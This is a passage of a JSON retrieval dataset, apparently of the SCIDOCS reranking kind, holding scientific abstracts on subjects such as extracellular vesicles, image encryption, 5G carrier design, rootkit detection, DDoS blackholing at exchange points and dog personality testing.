"text": "Growing evidence suggests that transcriptional regulators and secreted RNA molecules encapsulated within membrane vesicles modify the phenotype of target cells. Membrane vesicles, actively released by cells, represent a mechanism of intercellular communication that is conserved evolutionarily and involves the transfer of molecules able to induce epigenetic changes in recipient cells. Extracellular vesicles, which include exosomes and microvesicles, carry proteins, bioactive lipids, and nucleic acids, which are protected from enzyme degradation. These vesicles can transfer signals capable of altering cell function and/or reprogramming targeted cells. In the present review we focus on the extracellular vesicle-induced epigenetic changes in recipient cells that may lead to phenotypic and functional modifications. The relevance of these phenomena in stem cell biology and tissue repair is discussed.",
"title": ""
},
{
"docid": "d8938884a61e7c353d719dbbb65d00d0",
"text": "Image encryption plays an important role to ensure confidential transmission and storage of image over internet. However, a real–time image encryption faces a greater challenge due to large amount of data involved. This paper presents a review on image encryption techniques of both full encryption and partial encryption schemes in spatial, frequency and hybrid domains.",
"title": ""
},
{
"docid": "cab0fd454701c0b302040a1875ab2865",
"text": "They are susceptible to a variety of attacks, including node capture, physical tampering, and denial of service, while prompting a range of fundamental research challenges.",
"title": ""
},
{
"docid": "57dbe095ca124fbf0fc394b927e9883f",
"text": "How much is 131 million US dollars? To help readers put such numbers in context, we propose a new task of automatically generating short descriptions known as perspectives, e.g. “$131 million is about the cost to employ everyone in Texas over a lunch period”. First, we collect a dataset of numeric mentions in news articles, where each mention is labeled with a set of rated perspectives. We then propose a system to generate these descriptions consisting of two steps: formula construction and description generation. In construction, we compose formulae from numeric facts in a knowledge base and rank the resulting formulas based on familiarity, numeric proximity and semantic compatibility. In generation, we convert a formula into natural language using a sequence-to-sequence recurrent neural network. Our system obtains a 15.2% F1 improvement over a non-compositional baseline at formula construction and a 12.5 BLEU point improvement over a baseline description generation.",
"title": ""
},
{
"docid": "b99207292a098761d1bb5cc220cf0790",
"text": "Many researchers have attempted to predict the Enron corporate hierarchy from the data. This work, however, has been hampered by a lack of data. We present a new, large, and freely available gold-standard hierarchy. Using our new gold standard, we show that a simple lower bound for social network-based systems outperforms an upper bound on the approach taken by current NLP systems.",
"title": ""
},
{
"docid": "c4e7c757ad5a67b550d09f530b5204ef",
"text": "This paper describes our effort for a planning-based computational model of narrative generation that is designed to elicit surprise in the reader's mind, making use of two temporal narrative devices: flashback and foreshadowing. In our computational model, flashback provides a backstory to explain what causes a surprising outcome, while foreshadowing gives hints about the surprise before it occurs. Here, we present Prevoyant, a planning-based computational model of surprise arousal in narrative generation, and analyze the effectiveness of Prevoyant. The work here also presents a methodology to evaluate surprise in narrative generation using a planning-based approach based on the cognitive model of surprise causes. The results of the experiments that we conducted show strong support that Prevoyant effectively generates a discourse structure for surprise arousal in narrative.",
"title": ""
},
{
"docid": "e4a13888d88b3d7df1956813c06c4fd9",
"text": "Climate change is predicted to have a range of direct and indirect impacts on marine and freshwater capture fisheries, with implications for fisheries-dependent economies, coastal communities and fisherfolk. This technical paper reviews these predicted impacts, and introduces and applies the concepts of vulnerability, adaptation and adaptive capacity. Capture fisheries are largely driven by fossil fuels and so contribute to greenhouse gas emissions through fishing operations, estimated at 40-130 Tg CO2. Transportation of catches is another source of emissions, which are uncertain due to modes and distances of transportation but may exceed those from fishing operations. Mitigation measures may impact on fisheries by increasing the cost of fossil fuel use. Fisheries and fisherfolk may be impacted in a wide range of ways due to climate change. These include biophysical impacts on the distribution or productivity of marine and freshwater fish stocks through processes such as ocean acidification, habitat damage, changes in oceanography, disruption to precipitation and freshwater availability. Fisheries will also be exposed to a diverse range of direct and indirect climate impacts, including displacement and migration of human populations; impacts on coastal communities and infrastructure due to sea level rise; and changes in the frequency, distribution or intensity of tropical storms. Fisheries are dynamic social-ecological systems and are already experiencing rapid change in markets, exploitation and governance, ensuring a constantly developing context for future climate-related impacts. These existing socioeconomic trends and the indirect effects of climate change may interact with, amplify or even overwhelm biophysical impacts on fish ecology. The variety of different impact mechanisms, complex interactions between social, ecological and economic systems, and Climate change implications for fisheries and aquaculture – Overview of current scientific knowledge 108 the possibility of sudden and surprising changes make future effects of climate change on fisheries difficult to predict. The vulnerability of fisheries and fishing communities depends on their exposure and sensitivity to change, but also on the ability of individuals or systems to anticipate and adapt. This adaptive capacity relies on various assets and can be constrained by culture or marginalization. Vulnerability varies between countries and communities, and between demographic groups within society. Generally, poorer and less empowered countries and individuals are more vulnerable to climate impacts, and the vulnerability of fisheries is likely to be higher where they already suffer from overexploitation or overcapacity. Adaptation to climate impacts includes reactive or anticipatory actions by individuals or public institutions. These range from abandoning fisheries altogether for alternative occupations, to developing insurance and warning systems and changing fishing operations. Governance of fisheries affects the range of adaptation options available and will need to be flexible enough to account for changes in stock distribution and abundance. Governance aimed towards equitable and sustainable fisheries, accepting inherent uncertainty, and based on an ecosystem approach, as currently advocated, is thought to generally improve the adaptive capacity of fisheries. 
However, adaptation may be costly and limited in scope, so that mitigation of emissions to minimise climate change remain a key responsibility of governments.",
"title": ""
},
{
"docid": "bf9ef1e84275ac77be0fd71334dde1ab",
"text": "The development of summarization research has been significantly hampered by the costly acquisition of reference summaries. This paper proposes an effective way to automatically collect large scales of news-related multi-document summaries with reference to social media’s reactions. We utilize two types of social labels in tweets, i.e., hashtags and hyper-links. Hashtags are used to cluster documents into different topic sets. Also, a tweet with a hyper-link often highlights certain key points of the corresponding document. We synthesize a linked document cluster to form a reference summary which can cover most key points. To this aim, we adopt the ROUGE metrics to measure the coverage ratio, and develop an Integer Linear Programming solution to discover the sentence set reaching the upper bound of ROUGE. Since we allow summary sentences to be selected from both documents and highquality tweets, the generated reference summaries could be abstractive. Both informativeness and readability of the collected summaries are verified by manual judgment. In addition, we train a Support Vector Regression summarizer on DUC generic multi-document summarization benchmarks. With the collected data as extra training resource, the performance of the summarizer improves a lot on all the test sets. We release this dataset for further research.",
"title": ""
},
{
"docid": "4dd0d34f6b67edee60f2e6fae5bd8dd9",
"text": "Virtual learning environments facilitate online learning, generating and storing large amounts of data during the learning/teaching process. This stored data enables extraction of valuable information using data mining. In this article, we present a systematic mapping, containing 42 papers, where data mining techniques are applied to predict students performance using Moodle data. Results show that decision trees are the most used classification approach. Furthermore, students interactions in forums are the main Moodle attribute analyzed by researchers.",
"title": ""
},
{
"docid": "7bedcb8eb5f458ba238c82249c80657d",
"text": "The spread of antibiotic-resistant bacteria is a growing problem and a public health issue. In recent decades, various genetic mechanisms involved in the spread of resistance genes among bacteria have been identified. Integrons - genetic elements that acquire, exchange, and express genes embedded within gene cassettes (GC) - are one of these mechanisms. Integrons are widely distributed, especially in Gram-negative bacteria; they are carried by mobile genetic elements, plasmids, and transposons, which promote their spread within bacterial communities. Initially studied mainly in the clinical setting for their involvement in antibiotic resistance, their role in the environment is now an increasing focus of attention. The aim of this review is to provide an in-depth analysis of recent studies of antibiotic-resistance integrons in the environment, highlighting their potential involvement in antibiotic-resistance outside the clinical context. We will focus particularly on the impact of human activities (agriculture, industries, wastewater treatment, etc.).",
"title": ""
},
{
"docid": "b04ae3842293f5f81433afbaa441010a",
"text": "Rootkits Trojan virus, which can control attacked computers, delete import files and even steal password, are much popular now. Interrupt Descriptor Table (IDT) hook is rootkit technology in kernel level of Trojan. The paper makes deeply analysis on the IDT hooks handle procedure of rootkit Trojan according to previous other researchers methods. We compare its IDT structure and programs to find how Trojan interrupt handler code can respond the interrupt vector request in both real address mode and protected address mode. Finally, we analyze the IDT hook detection methods of rootkits Trojan by Windbg or other professional tools.",
"title": ""
},
{
"docid": "9c0db9ac984a93d4a0019dd76e6ccdcf",
"text": "This paper presents a high power efficient broad-band programmable gain amplifier with multi-band switching. The proposed two stage common-emitter amplifier, by using the current reuse topology with a magnetically coupled transformer and a MOS varactor bank as a frequency tunable load, achieves a 55.9% peak power added efficiency (PAE), a peak saturated power of +11.1 dBm, a variable gain from 1.8 to 16 dB, and a tunable large signal 3-dB bandwidth from 24.3 to 35 GHz. The design is fabricated in a commercial 0.18- μm SiGe BiCMOS technology and measured with an output 1-dB gain compression point which is better than +9.6 dBm and a maximum dc power consumption of 22.5 mW from a single 1.8 V supply. The core amplifier, excluding the measurement pads, occupies a die area of 500 μm×450 μm.",
"title": ""
},
{
"docid": "b54215466bcdf86442f9a6e87e831069",
"text": "In this paper, we consider the problem of tracking human motion with a 22-DOF kinematic model from depth images. In contrast to existing approaches, our system naturally scales to multiple sensors. The motivation behind our approach, termed Multiple Depth Camera Approach (MDCA), is that by using several cameras, we can significantly improve the tracking quality and reduce ambiguities as for example caused by occlusions. By fusing the depth images of all available cameras into one joint point cloud, we can seamlessly incorporate the available information from multiple sensors into the pose estimation. To track the high-dimensional human pose, we employ state-of-the-art annealed particle filtering and partition sampling. We compute the particle likelihood based on the truncated signed distance of each observed point to a parameterized human shape model. We apply a coarse-to-fine scheme to recognize a wide range of poses to initialize the tracker. In our experiments, we demonstrate that our approach can accurately track human motion in real-time (15Hz) on a GPGPU. In direct comparison to two existing trackers (OpenNI, Microsoft Kinect SDK), we found that our approach is significantly more robust for unconstrained motions and under (partial) occlusions.",
"title": ""
},
{
"docid": "a5d8fa2e03cb51b30013a9e21477ef61",
"text": "PURPOSE\nThe aim of this study was to establish the role of magnetic resonance imaging (MRI) in patients with Mayer-Rokitansky-Kuster-Hauser syndrome (MRKHS).\n\n\nMATERIALS AND METHODS\nSixteen female MRKHS patients (mean age, 19.4 years; range, 11-39 years) were studied using MRI. Two experienced radiologists evaluated all the images in consensus to assess the presence or absence of the ovaries, uterus, and vagina. Additional urogenital or vertebral pathologies were also noted.\n\n\nRESULTS\nOf the 16 patients, complete aplasia of uterus was seen in five patients (31.3%). Uterine hypoplasia or remnant uterus was detected in 11 patients (68.8%). Ovaries were clearly seen in 10 patients (62.5%), and in two of the 10 patients, no descent of ovaries was detected. In five patients, ovaries could not be detected on MRI. In one patient, agenesis of right ovary was seen, and the left ovary was in normal shape. Of the 16 cases, 11 (68.8%) had no other extragenital abnormalities. Additional abnormalities were detected in six patients (37.5%). Two of the six had renal agenesis, and one patient had horseshoe kidney; renal ectopy was detected in two patients, and one patient had urachal remnant. Vertebral abnormalities were detected in two patients; one had L5 posterior fusion defect, bilateral hemisacralization, and rotoscoliosis, and the other had coccygeal vertebral fusion.\n\n\nCONCLUSION\nMRI is a useful and noninvasive imaging method in the diagnosis and evaluation of patients with MRKHS.",
"title": ""
},
{
"docid": "2e5789bd2089a4b15686a595b79eb7cc",
"text": "Background: The growing prevalence of chronic diseases and home-based treatments has led to the introduction of a large number of instruments for assessing the caregiving-related problems associated with specific diseases, but our Family Strain Questionnaire (FSQ) was designed to provide a basis for general screening and comparison regardless of the disease. We here describe the final validation of its psychometric characteristics. Methods: The FSQ consists of a brief semi-structured interview and 44 dichotomic items, and has now been administered to 811 caregivers (285 were simultaneously administered other questionnaires assessing anxiety and depressive symptoms). After a factorial analysis confirmed the 5-factor structure identified in previous studies (emotional burden, problems in social involvement, need for knowledge about the disease, satisfaction with family relationships, and thoughts about death), we undertook correlation and reliability analyses, and a receiver operating characteristics curve analysis designed to determine the cut-off point for the emotional problems identified by the first factor. Finally, univariate ANOVA with Bonferroni's post-hoc test was used to compare the disease-specific scores. Results: The validity and reliability of the FSQ is good, and its factorial structure refers to areas that are internationally considered as being of general importance. The semi-structured interview collects information concerning the socio-economic status of caregivers and their convictions/interpretations concerning the diseases of their patients. Conclusions: The FSQ can be used as a single instrument for the general assessment of caregiving-related problems regardless of the reference disease. This makes it possible to reduce administration and analysis times, and compare the problems experienced by the caregivers of patients with different diseases.",
"title": ""
},
{
"docid": "4c290421dc42c3a5a56c7a4b373063e5",
"text": "In this paper, we provide a graph theoretical framework that allows us to formally define formations of multiple vehicles and the issues arising in uniqueness of graph realizations and its connection to stability of formations. The notion of graph rigidity is crucial in identifying the shape variables of a formation and an appropriate potential function associated with the formation. This allows formulation of meaningful optimization or nonlinear control problems for formation stabilization/tacking, in addition to formal representation of split, rejoin, and reconfiguration maneuvers for multi-vehicle formations. We introduce an algebra that consists of performing some basic operations on graphs which allow creation of larger rigidby-construction graphs by combining smaller rigid subgraphs. This is particularly useful in performing and representing rejoin/split maneuvers of multiple formations in a distributed fashion.",
"title": ""
},
{
"docid": "5d546a8d21859a057d36cdbd3fa7f887",
"text": "In 1984, a prospective cohort study, Coronary Artery Risk Development in Young Adults (CARDIA) was initiated to investigate life-style and other factors that influence, favorably and unfavorably, the evolution of coronary heart disease risk factors during young adulthood. After a year of planning and protocol development, 5,116 black and white women and men, age 18-30 years, were recruited and examined in four urban areas: Birmingham, Alabama; Chicago, Illinois; Minneapolis, Minnesota, and Oakland, California. The initial examination included carefully standardized measurements of major risk factors as well as assessments of psychosocial, dietary, and exercise-related characteristics that might influence them, or that might be independent risk factors. This report presents the recruitment and examination methods as well as the mean levels of blood pressure, total plasma cholesterol, height, weight and body mass index, and the prevalence of cigarette smoking by age, sex, race and educational level. Compared to recent national samples, smoking is less prevalent in CARDIA participants, and weight tends to be greater. Cholesterol levels are representative and somewhat lower blood pressures in CARDIA are probably, at least in part, due to differences in measurement methods. Especially noteworthy among several differences in risk factor levels by demographic subgroup, were a higher body mass index among black than white women and much higher prevalence of cigarette smoking among persons with no more than a high school education than among those with more education.",
"title": ""
}
] | scidocsrr |
cd62837591ea2eaba85de851d46ae42e | Emerging technologies and research challenges for 5G wireless networks | [
{
"docid": "22255906a7f1d30c9600728a6dc9ad9f",
"text": "The next major step in the evolution of LTE targets the rapidly increasing demand for mobile broadband services and traffic volumes. One of the key technologies is a new carrier type, referred to in this article as a Lean Carrier, an LTE carrier with minimized control channel overhead and cell-specific reference signals. The Lean Carrier can enhance spectral efficiency, increase spectrum flexibility, and reduce energy consumption. This article provides an overview of the motivations and main use cases of the Lean Carrier. Technical challenges are highlighted, and design options are discussed; finally, a performance evaluation quantifies the benefits of the Lean Carrier.",
"title": ""
}
] | [
{
"docid": "f0bac8caa5bfe019400871c5bf760ddc",
"text": "The skill of natural spoken interaction is crucial for artificial intelligent systems. To equip these systems with this skill, model-based statistical dialogue systems are essential. However, this goal is still far from reach. In this paper, the basics of statistical spoken dialogue systems, which play a key role in natural interaction, are presented. Furthermore, I will outline two principal aspects and argue why those are important to achieve natural interactions.",
"title": ""
},
{
"docid": "1114300ff9cab6dc29e80c4d22e45e1e",
"text": "Single- and dual-feed, dual-frequency, low-profile antennas with independent tuning using varactor diodes have been demonstrated. The dual-feed planar inverted F-antenna (PIFA) has two operating frequencies which can be independently tuned from 0.7 to 1.1 GHz and from 1.7 to 2.3 GHz with better than -10 dB impedance match. The isolation between the high-band and the low-band ports is >13 dB; hence, one resonant frequency can be tuned without affecting the other. The single-feed antenna has two resonant frequencies, which can be independently tuned from 1.2 to 1.6 GHz and from 1.6 to 2.3 GHz with better than -10 dB impedance match for most of the tuning range. The tuning is done using varactor diodes with a capacitance range from 0.8 to 3.8 pF, which is compatible with RF MEMS devices. The antenna volumes are 63 × 100 × 3.15 mm3 on er = 3.55 substrates and the measured antenna efficiencies vary between 25% and 50% over the tuning range. The application areas are in carrier aggregation systems for fourth generation (4G) wireless systems.",
"title": ""
},
{
"docid": "4fbd13e1bcbb78bac456addce272cbe6",
"text": "Musical memory is considered to be partly independent from other memory systems. In Alzheimer's disease and different types of dementia, musical memory is surprisingly robust, and likewise for brain lesions affecting other kinds of memory. However, the mechanisms and neural substrates of musical memory remain poorly understood. In a group of 32 normal young human subjects (16 male and 16 female, mean age of 28.0 ± 2.2 years), we performed a 7 T functional magnetic resonance imaging study of brain responses to music excerpts that were unknown, recently known (heard an hour before scanning), and long-known. We used multivariate pattern classification to identify brain regions that encode long-term musical memory. The results showed a crucial role for the caudal anterior cingulate and the ventral pre-supplementary motor area in the neural encoding of long-known as compared with recently known and unknown music. In the second part of the study, we analysed data of three essential Alzheimer's disease biomarkers in a region of interest derived from our musical memory findings (caudal anterior cingulate cortex and ventral pre-supplementary motor area) in 20 patients with Alzheimer's disease (10 male and 10 female, mean age of 68.9 ± 9.0 years) and 34 healthy control subjects (14 male and 20 female, mean age of 68.1 ± 7.2 years). Interestingly, the regions identified to encode musical memory corresponded to areas that showed substantially minimal cortical atrophy (as measured with magnetic resonance imaging), and minimal disruption of glucose-metabolism (as measured with (18)F-fluorodeoxyglucose positron emission tomography), as compared to the rest of the brain. However, amyloid-β deposition (as measured with (18)F-flobetapir positron emission tomography) within the currently observed regions of interest was not substantially less than in the rest of the brain, which suggests that the regions of interest were still in a very early stage of the expected course of biomarker development in these regions (amyloid accumulation → hypometabolism → cortical atrophy) and therefore relatively well preserved. Given the observed overlap of musical memory regions with areas that are relatively spared in Alzheimer's disease, the current findings may thus explain the surprising preservation of musical memory in this neurodegenerative disease.",
"title": ""
},
{
"docid": "3c47a26bfe8221828da80a32b993fbc3",
"text": "Named Entity Recognition (NER) is always limited by its lower recall resulting from the asymmetric data distribution where the NONE class dominates the entity classes. This paper presents an approach that exploits non-local information to improve the NER recall. Several kinds of non-local features encoding entity token occurrence, entity boundary and entity class are explored under Conditional Random Fields (CRFs) framework. Experiments on SIGHAN 2006 MSRA (CityU) corpus indicate that non-local features can effectively enhance the recall of the state-of-the-art NER systems. Incorporating the non-local features into the NER systems using local features alone, our best system achieves a 23.56% (25.26%) relative error reduction on the recall and 17.10% (11.36%) relative error reduction on the F1 score; the improved F1 score 89.38% (90.09%) is significantly superior to the best NER system with F1 of 86.51% (89.03%) participated in the closed track.",
"title": ""
},
{
"docid": "b9147ef0cf66bdb7ecc007a4e3092790",
"text": "This paper is related to the use of social media for disaster management by humanitarian organizations. The past decade has seen a significant increase in the use of social media to manage humanitarian disasters. It seems, however, that it has still not been used to its full potential. In this paper, we examine the use of social media in disaster management through the lens of Attribution Theory. Attribution Theory posits that people look for the causes of events, especially unexpected and negative events. The two major characteristics of disasters are that they are unexpected and have negative outcomes/impacts. Thus, Attribution Theory may be a good fit for explaining social media adoption patterns by emergency managers. We propose a model, based on Attribution Theory, which is designed to understand the use of social media during the mitigation and preparedness phases of disaster management. We also discuss the theoretical contributions and some practical implications. This study is still in its nascent stage and is research in progress.",
"title": ""
},
{
"docid": "05e754e0567bf6859d7a68446fc81bad",
"text": "Bad presentation of medical statistics such as the risks associated with a particular intervention can lead to patients making poor decisions on treatment. Particularly confusing are single event probabilities, conditional probabilities (such as sensitivity and specificity), and relative risks. How can doctors improve the presentation of statistical information so that patients can make well informed decisions?",
"title": ""
},
{
"docid": "bb314530c796fbec6679a4a0cc6cd105",
"text": "The undergraduate computer science curriculum is generally focused on skills and tools; most students are not exposed to much research in the field, and do not learn how to navigate the research literature. We describe how science fiction reviews were used as a gateway to research reviews. Students learn a little about current or recent research on a topic that stirs their imagination, and learn how to search for, read critically, and compare technical papers on a topic related their chosen science fiction book, movie, or TV show.",
"title": ""
},
{
"docid": "05fe74d25c84e46b8044faca8a350a2f",
"text": "BACKGROUND\nAn observational study was conducted in 12 European countries by the European Federation of Clinical Chemistry and Laboratory Medicine Working Group for the Preanalytical Phase (EFLM WG-PRE) to assess the level of compliance with the CLSI H3-A6 guidelines.\n\n\nMETHODS\nA structured checklist including 29 items was created to assess the compliance of European phlebotomy procedures with the CLSI H3-A6 guideline. A risk occurrence chart of individual phlebotomy steps was created from the observed error frequency and severity of harm of each guideline key issue. The severity of errors occurring during phlebotomy was graded using the risk occurrence chart.\n\n\nRESULTS\nTwelve European countries participated with a median of 33 (18-36) audits per country, and a total of 336 audits. The median error rate for the total phlebotomy procedure was 26.9 % (10.6-43.8), indicating a low overall compliance with the recommended CLSI guideline. Patient identification and test tube labelling were identified as the key guideline issues with the highest combination of probability and potential risk of harm. Administrative staff did not adhere to patient identification procedures during phlebotomy, whereas physicians did not adhere to test tube labelling policy.\n\n\nCONCLUSIONS\nThe level of compliance of phlebotomy procedures with the CLSI H3-A6 guidelines in 12 European countries was found to be unacceptably low. The most critical steps in need of immediate attention in the investigated countries are patient identification and tube labelling.",
"title": ""
},
{
"docid": "c1ca7ef76472258c6359111dd4d014d5",
"text": "Online forums contain huge amounts of valuable user-generated content. In current forum systems, users have to passively wait for other users to visit the forum systems and read/answer their questions. The user experience for question answering suffers from this arrangement. In this paper, we address the problem of \"pushing\" the right questions to the right persons, the objective being to obtain quick, high-quality answers, thus improving user satisfaction. We propose a framework for the efficient and effective routing of a given question to the top-k potential experts (users) in a forum, by utilizing both the content and structures of the forum system. First, we compute the expertise of users according to the content of the forum system—-this is to estimate the probability of a user being an expert for a given question based on the previous question answering of the user. Specifically, we design three models for this task, including a profile-based model, a thread-based model, and a cluster-based model. Second, we re-rank the user expertise measured in probability by utilizing the structural relations among users in a forum system. The results of the two steps can be integrated naturally in a probabilistic model that computes a final ranking score for each user. Experimental results show that the proposals are very promising.",
"title": ""
},
{
"docid": "4b630a5cd7d0be0fb083b500f2ac84c2",
"text": "Image processing algorithms are used for converting textual image to editable text. One application could be a car number plate recognition (CNPR) system where these type of algorithms automatically detect the car registration number by capturing an image. In this paper, we improve one of the existing CNPR algorithms. The contributions include: multiple template matching; considering light intensity and recognizing the car number plate even in low intense light and independence of distance of car number plate to camera. The involvement of different conditions and external factors actually improve the CNPR system efficiency. We run different experiments on different car number plates. Our proposed improvements yield better results in terms of false positive and false negative values for CNPR.",
"title": ""
},
{
"docid": "fb83fca1b1ed1fca15542900bdb3748d",
"text": "Learning disease severity scores automatically from collected measurements may aid in the quality of both healthcare and scientific understanding. Some steps in that direction have been taken and machine learning algorithms for extracting scoring functions from data have been proposed. Given the rapid increase in both quantity and diversity of data measured and stored, the large amount of information is becoming one of the challenges for learning algorithms. In this work, we investigated the direction of the problemwhere the dimensionality of measured variables is large. Learning the severity score in such cases brings the issue of which of measured features are relevant. We have proposed a novel approach by combining desirable properties of existing formulations, which compares favorably to alternatives in accuracy and especially in the robustness of the learned scoring function.The proposed formulation has a nonsmooth penalty that induces sparsity.This problem is solved by addressing a dual formulationwhich is smooth and allows an efficient optimization.The proposed approachmight be used as an effective and reliable tool for both scoring function learning and biomarker discovery, as demonstrated by identifying a stable set of genes related to influenza symptoms’ severity, which are enriched in immune-related processes.",
"title": ""
},
{
"docid": "81385958cac7df4cc51b35762e6c2806",
"text": "DDoS attacks remain a serious threat not only to the edge of the Internet but also to the core peering links at Internet Exchange Points (IXPs). Currently, the main mitigation technique is to blackhole traffic to a specific IP prefix at upstream providers. Blackholing is an operational technique that allows a peer to announce a prefix via BGP to another peer, which then discards traffic destined for this prefix. However, as far as we know there is only anecdotal evidence of the success of blackholing. Largely unnoticed by research communities, IXPs have deployed blackholing as a service for their members. In this first-of-its-kind study, we shed light on the extent to which blackholing is used by the IXP members and what effect it has on traffic. Within a 12 week period we found that traffic to more than 7, 864 distinct IP prefixes was blackholed by 75 ASes. The daily patterns emphasize that there are not only a highly variable number of new announcements every day but, surprisingly, there are a consistently high number of announcements (> 1000). Moreover, we highlight situations in which blackholing succeeds in reducing the DDoS attack traffic.",
"title": ""
},
{
"docid": "fc1fd2421184caeebeb8c1f6993b0267",
"text": "Deep neural networks are increasingly being used in a variety of machine learning applications applied to rich user data on the cloud. However, this approach introduces a number of privacy and efficiency challenges, as the cloud operator can perform secondary inferences on the available data. Recently, advances in edge processing have paved the way for more efficient, and private, data processing at the source for simple tasks and lighter models, though they remain a challenge for larger, and more complicated models. In this paper, we present a hybrid approach for breaking down large, complex deep models for cooperative, privacy-preserving analytics. We do this by breaking down the popular deep architectures and fine-tune them in a particular way. We then evaluate the privacy benefits of this approach based on the information exposed to the cloud service. We also asses the local inference cost of different layers on a modern handset for mobile applications. Our evaluations show that by using certain kind of fine-tuning and embedding techniques and at a small processing costs, we can greatly reduce the level of information available to unintended tasks applied to the data feature on the cloud, and hence achieving the desired tradeoff between privacy and performance.",
"title": ""
},
{
"docid": "a016fb3b7e5c4bcf386d775c7c61a887",
"text": "How do journalists mark quoted content as certain or uncertain, and how do readers interpret these signals? Predicates such as thinks, claims, and admits offer a range of options for framing quoted content according to the author’s own perceptions of its credibility. We gather a new dataset of direct and indirect quotes from Twitter, and obtain annotations of the perceived certainty of the quoted statements. We then compare the ability of linguistic and extra-linguistic features to predict readers’ assessment of the certainty of quoted content. We see that readers are indeed influenced by such framing devices — and we find no evidence that they consider other factors, such as the source, journalist, or the content itself. In addition, we examine the impact of specific framing devices on perceptions of credibility.",
"title": ""
},
{
"docid": "c01dd2ae90781291cb5915957bd42ae1",
"text": "Mobile devices have become an important part of our everyday life, harvesting more and more confidential user information. Their portable nature and the great exposure to security attacks, however, call out for stronger authentication mechanisms than simple password-based identification. Biometric authentication techniques have shown potential in this context. Unfortunately, prior approaches are either excessively prone to forgery or have too low accuracy to foster widespread adoption. In this paper, we propose sensor-enhanced keystroke dynamics, a new biometric mechanism to authenticate users typing on mobile devices. The key idea is to characterize the typing behavior of the user via unique sensor features and rely on standard machine learning techniques to perform user authentication. To demonstrate the effectiveness of our approach, we implemented an Android prototype system termed Unagi. Our implementation supports several feature extraction and detection algorithms for evaluation and comparison purposes. Experimental results demonstrate that sensor-enhanced keystroke dynamics can improve the accuracy of recent gestured-based authentication mechanisms (i.e., EER>0.5%) by one order of magnitude, and the accuracy of traditional keystroke dynamics (i.e., EER>7%) by two orders of magnitude.",
"title": ""
},
{
"docid": "615891cdd2860247d7837634bc3478f8",
"text": "An exact probabilistic formulation of the “square root law” conjectured byPrice is given and a probability distribution satisfying this law is defined, for which the namePrice distribution is suggested. Properties of thePrice distribution are discussed, including its relationship with the laws ofLotka andZipf. No empirical support of applicability ofPrice distribution as a model for publication productivity could be found.",
"title": ""
},
{
"docid": "6b18d45d56b9e3f34ce9b983bb8d30a9",
"text": "1. The size of the Mexican overwintering population of monarch butterflies has decreased over the last decade. Approximately half of these butterflies come from the U.S. Midwest where larvae feed on common milkweed. There has been a large decline in milkweed in agricultural fields in the Midwest over the last decade. This loss is coincident with the increased use of glyphosate herbicide in conjunction with increased planting of genetically modified (GM) glyphosate-tolerant corn (maize) and soybeans (soya). 2. We investigate whether the decline in the size of the overwintering population can be attributed to a decline in monarch production owing to a loss of milkweeds in agricultural fields in the Midwest. We estimate Midwest annual monarch production using data on the number of monarch eggs per milkweed plant for milkweeds in different habitats, the density of milkweeds in different habitats, and the area occupied by those habitats on the landscape. 3. We estimate that there has been a 58% decline in milkweeds on the Midwest landscape and an 81% decline in monarch production in the Midwest from 1999 to 2010. Monarch production in the Midwest each year was positively correlated with the size of the subsequent overwintering population in Mexico. Taken together, these results strongly suggest that a loss of agricultural milkweeds is a major contributor to the decline in the monarch population. 4. The smaller monarch population size that has become the norm will make the species more vulnerable to other conservation threats.",
"title": ""
},
{
"docid": "813a0d47405d133263deba0da6da27a8",
"text": "The demands on dielectric material measurements have increased over the years as electrical components have been miniaturized and device frequency bands have increased. Well-characterized dielectric measurements on thin materials are needed for circuit design, minimization of crosstalk, and characterization of signal-propagation speed. Bulk material applications have also increased. For accurate dielectric measurements, each measurement band and material geometry requires specific fixtures. Engineers and researchers must carefully match their material system and uncertainty requirements to the best available measurement system. Broadband measurements require transmission-line methods, and accurate measurements on low-loss materials are performed in resonators. The development of the most accurate methods for each application requires accurate fixture selection in terms of field geometry, accurate field models, and precise measurement apparatus.",
"title": ""
},
{
"docid": "140815c8ccd62d0169fa294f6c4994b8",
"text": "Six specific personality traits – playfulness, chase-proneness, curiosity/fearlessness, sociability, aggressiveness, and distance-playfulness – and a broad boldness dimension have been suggested for dogs in previous studies based on data collected in a standardized behavioural test (‘‘dog mentality assessment’’, DMA). In the present study I investigated the validity of the specific traits for predicting typical behaviour in everyday life. A questionnaire with items describing the dog’s typical behaviour in a range of situations was sent to owners of dogs that had carried out the DMA behavioural test 1–2 years earlier. Of the questionnaires that were sent out 697 were returned, corresponding to a response rate of 73.3%. Based on factor analyses on the questionnaire data, behavioural factors in everyday life were suggested to correspond to the specific personality traits from the DMA. Correlation analyses suggested construct validity for the traits playfulness, curiosity/ fearlessness, sociability, and distance-playfulness. Chase-proneness, which I expected to be related to predatory behaviour in everyday life, was instead related to human-directed play interest and nonsocial fear. Aggressiveness was the only trait from the DMA with low association to all of the behavioural factors from the questionnaire. The results suggest that three components of dog personality are measured in the DMA: (1) interest in playing with humans; (2) attitude towards strangers (interest in, fear of, and aggression towards); and (3) non-social fearfulness. These three components correspond to the traits playfulness, sociability, and curiosity/fearlessness, respectively, all of which were found to be related to a higher-order shyness–boldness dimension. www.elsevier.com/locate/applanim Applied Animal Behaviour Science 91 (2005) 103–128 * Present address: Department of Anatomy and Physiology, Faculty of Veterinary Medicine and Animal Science, Swedish University of Agricultural Sciences, Box 7011, SE-750 07 Uppsala, Sweden. Tel.: +46 18 67 28 21; fax: +46 18 67 21 11. E-mail address: kenth.svartberg@afys.slu.se. 0168-1591/$ – see front matter # 2004 Elsevier B.V. All rights reserved. doi:10.1016/j.applanim.2004.08.030 Chase-proneness and distance-playfulness seem to be mixed measures of these personality components, and are not related to any additional components. Since the time between the behavioural test and the questionnaire was 1–2 years, the results indicate long-term consistency of the personality components. Based on these results, the DMA seems to be useful in predicting behavioural problems that are related to social and non-social fear, but not in predicting other potential behavioural problems. However, considering this limitation, the test seems to validly assess important aspects of dog personality, which supports the use of the test as an instrument in dog breeding and in selection of individual dogs for different purposes. # 2004 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "1eeb833473e87c936ee52c471e6d95ad",
